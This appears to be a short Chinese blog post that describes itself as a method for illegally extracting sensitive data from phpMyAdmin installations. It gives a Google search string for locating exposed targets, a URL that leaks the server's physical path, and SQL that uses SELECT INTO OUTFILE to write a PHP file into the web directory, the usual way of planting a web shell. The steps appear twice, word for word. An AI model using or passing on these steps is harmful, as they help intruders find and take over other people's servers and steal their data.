本文介绍了一种通过SQL注入手段从phpMyAdmin中非法获取敏感信息的方法。包括定位登录密码、获取物理路径及读取特定文件内容的具体步骤。
google 搜索 Runtime Information inurl:phpmyadmin
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(’’);
select cmd from a into outfile ’D:/phpMyAdmin/libraries/d.php’;
Drop TABLE IF EXISTS a;
----end code---
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(’’);
select cmd from a into outfile ’D:/phpMyAdmin/libraries/d.php’;
Drop TABLE IF EXISTS a;
----end code---
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
